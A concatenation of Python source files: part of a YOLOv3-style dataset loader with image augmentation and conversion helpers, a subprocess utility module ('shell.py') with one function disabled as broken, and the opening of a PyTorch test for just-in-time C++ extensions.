def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
shell.py
|
import os
import queue
import shlex
import select
import threading as mt
import subprocess as sp
from .constants import RUNNING, DONE, FAILED
from .misc import is_string
# ------------------------------------------------------------------------------
#
def sh_callout(cmd, stdout=True, stderr=True, shell=False, env=None):
'''
call a shell command, return `[stdout, stderr, retval]`.
'''
# convert string into arg list if needed
if is_string(cmd) and \
not shell: cmd = shlex.split(cmd)
if stdout : stdout = sp.PIPE
else : stdout = None
if stderr : stderr = sp.PIPE
else : stderr = None
p = sp.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
if not stdout and not stderr:
ret = p.wait()
else:
stdout, stderr = p.communicate()
ret = p.returncode
return stdout.decode("utf-8"), stderr.decode("utf-8"), ret
# ------------------------------------------------------------------------------
#
def sh_callout_bg(cmd, stdout=None, stderr=None, shell=False, env=None):
'''
call a shell command in the background. Do not attempt to pipe STDOUT/ERR,
but only support writing to named files.
'''
# pipes won't work - see sh_callout_async
if stdout == sp.PIPE: raise ValueError('stdout pipe unsupported')
if stderr == sp.PIPE: raise ValueError('stderr pipe unsupported')
# openfile descriptors for I/O, if needed
if is_string(stdout): stdout = open(stdout, 'w')
if is_string(stderr): stderr = open(stderr, 'w')
# convert string into arg list if needed
if not shell and is_string(cmd): cmd = shlex.split(cmd)
sp.Popen(cmd, stdout=stdout, stderr=stderr, shell=shell, env=env)
return
# ------------------------------------------------------------------------------
#
def sh_callout_async(cmd, stdin=True, stdout=True, stderr=True,
shell=False, env=None):
'''
Run a command, and capture stdout/stderr if so flagged. The call will
return an PROC object instance on which the captured output can be retrieved
line by line (I/O is line buffered). When the process is done, a `None`
will be returned on the I/O queues.
Line breaks are stripped.
stdout/stderr: True [default], False, string
- False : discard I/O
- True : capture I/O as queue [default]
- string: capture I/O as queue, also write to named file
shell: True, False [default]
- pass to popen
PROC:
- PROC.stdout : `queue.Queue` instance delivering stdout lines
- PROC.stderr : `queue.Queue` instance delivering stderr lines
- PROC.state : ru.RUNNING, ru.DONE, ru.FAILED
- PROC.rc : returncode (None while ru.RUNNING)
- PROC.stdout_filename: name of stdout file (when available)
- PROC.stderr_filename: name of stderr file (when available)
'''
# NOTE: Fucking python screws up stdio buffering when threads are used,
# *even if the treads do not perform stdio*. Its possible that the
# logging module interfers, too. Either way, I am fed up debugging
# this shit, and give up. This method does not work for threaded
# python applications.
assert(False), 'this is broken for python apps'
# --------------------------------------------------------------------------
#
class _P(object):
'''
internal representation of a process
'''
# ----------------------------------------------------------------------
def __init__(self, cmd, stdin, stdout, stderr, shell, env):
cmd = cmd.strip()
self._in_c = bool(stdin) # flag stdin capture
self._out_c = bool(stdout) # flag stdout capture
self._err_c = bool(stderr) # flag stderr capture
self._in_r , self._in_w = os.pipe() # put stdin to child
self._out_r, self._out_w = os.pipe() # get stdout from child
self._err_r, self._err_w = os.pipe() # get stderr from child
self._in_o = os.fdopen(self._in_r) # file object for in ep
self._out_o = os.fdopen(self._out_r) # file object for out ep
self._err_o = os.fdopen(self._err_r) # file object for err ep
self._in_q = queue.Queue() # get stdin from parent
self._out_q = queue.Queue() # put stdout to parent
self._err_q = queue.Queue() # put stderr to parent
if is_string(stdout): self._out_f = open(stdout, 'w')
else : self._out_f = None
if is_string(stderr): self._err_f = open(stderr, 'w')
else : self._err_f = None
self.state = RUNNING
self._proc = sp.Popen(cmd, stdin=self._in_r,
stdout=self._out_w,
stderr=self._err_w,
shell=shell,
env=env,
bufsize=1)
t = mt.Thread(target=self._watch)
t.daemon = True
t.start()
self.rc = None # return code
@property
def stdin(self):
if not self._in_c:
raise RuntimeError('stdin not captured')
return self._in_q
@property
def stdout(self):
if not self._out_c:
raise RuntimeError('stdout not captured')
return self._out_q
@property
def stderr(self):
if not self._err_c:
raise RuntimeError('stderr not captured')
return self._err_q
@property
def stdout_filename(self):
if not self._out_f:
raise RuntimeError('stdout not recorded')
return self._out_f.name
@property
def stderr_filename(self):
if not self._err_f:
raise RuntimeError('stderr not recorded')
return self._err_f.name
def kill(self):
self._proc.terminate()
# ----------------------------------------------------------------------
#
def _watch(self):
poller = select.poll()
poller.register(self._out_r, select.POLLIN | select.POLLHUP)
poller.register(self._err_r, select.POLLIN | select.POLLHUP)
# try forever to read stdin, stdout and stderr, stop only when
# either signals that process (parent or child) died
while True:
# check for input
data = self._in_q.get_nowait()
if data:
self._out_o.write(data)
self._out_f.write(data)
active = False
fds = poller.poll(100) # timeout configurable (ms)
for fd,mode in fds:
if mode & select.POLLHUP:
# fd died - grab data from other fds
continue
if fd == self._out_r:
o_in = self._out_o
q_out = self._out_q
f_out = self._out_f
elif fd == self._err_r:
o_in = self._err_o
q_out = self._err_q
f_out = self._err_f
line = o_in.readline() # `bufsize=1` in `popen`
if line:
# found valid data (active)
active = True
if q_out: q_out.put(line.rstrip('\n'))
if f_out: f_out.write(line)
# no data received - check process health
if not active and self._proc.poll() is not None:
# process is dead
self.rc = self._proc.returncode
if self.rc == 0: self.state = DONE
else : self.state = FAILED
if self._out_q: self._out_q.put(None) # signal EOF
if self._err_q: self._err_q.put(None) # signal EOF
if self._out_q: self._out_q.join() # ensure reads
if self._err_q: self._err_q.join() # ensure reads
return # finishes thread
# --------------------------------------------------------------------------
return _P(cmd=cmd, stdin=stdin, stdout=stdout, stderr=stderr,
shell=shell, env=env)
# ------------------------------------------------------------------------------
|
test_cpp_extensions_jit.py
|
import os
import shutil
import sys
import unittest
import warnings
import re
import tempfile
import subprocess
import glob
import textwrap
from multiprocessing import Process
import torch.testing._internal.common_utils as common
import torch
import torch.backends.cudnn
import torch.utils.cpp_extension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
from torch.testing._internal.common_utils import gradcheck, TEST_WITH_ASAN, has_breakpad
TEST_CUDA = torch.cuda.is_available() and CUDA_HOME is not None
TEST_CUDNN = False
TEST_ROCM = torch.cuda.is_available() and torch.version.hip is not None and ROCM_HOME is not None
if TEST_CUDA and torch.version.cuda is not None: # the skip CUDNN test for ROCm
CUDNN_HEADER_EXISTS = os.path.isfile(os.path.join(CUDA_HOME, "include/cudnn.h"))
TEST_CUDNN = (
TEST_CUDA and CUDNN_HEADER_EXISTS and torch.backends.cudnn.is_available()
)
IS_WINDOWS = sys.platform == "win32"
def remove_build_path():
if sys.platform == "win32":
print("Not wiping extensions build folder because Windows")
return
default_build_root = torch.utils.cpp_extension.get_default_build_root()
if os.path.exists(default_build_root):
shutil.rmtree(default_build_root)
class TestCppExtensionJIT(common.TestCase):
"""Tests just-in-time cpp extensions.
Don't confuse this with the PyTorch JIT (aka TorchScript).
"""
def setUp(self):
super().setUp()
# cpp extensions use relative paths. Those paths are relative to
# this file, so we'll change the working directory temporarily
self.old_working_dir = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(__file__)))
def tearDown(self):
super().tearDown()
# return the working directory (see setUp)
os.chdir(self.old_working_dir)
@classmethod
def setUpClass(cls):
remove_build_path()
@classmethod
def tearDownClass(cls):
remove_build_path()
def test_jit_compile_extension(self):
module = torch.utils.cpp_extension.load(
name="jit_extension",
sources=[
"cpp_extensions/jit_extension.cpp",
"cpp_extensions/jit_extension2.cpp",
],
extra_include_paths=["cpp_extensions"],
